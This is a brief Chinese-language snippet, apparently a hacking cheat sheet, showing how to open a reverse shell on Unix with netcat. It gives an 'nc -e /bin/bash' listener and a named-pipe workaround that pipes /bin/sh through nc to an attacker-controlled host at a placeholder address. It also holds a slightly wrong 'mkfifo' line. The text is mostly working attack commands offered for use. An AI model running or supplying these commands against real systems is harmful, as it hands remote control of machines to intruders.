Unix系统一般都有NC的,但是-e选项一般都默认不编译。
原生的反弹shell做法是
nc -l -vv -p 2222 -e /bin/bash

如果这样无法反弹的话,可以尝试下面的方法
现在/tmp下创建一个普通管道
mknod /tmp/backpipe p

mkfifo /tmp/backpipe p
然后管道的一边接入shell,另一边使用nc反弹到攻击者主机。
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe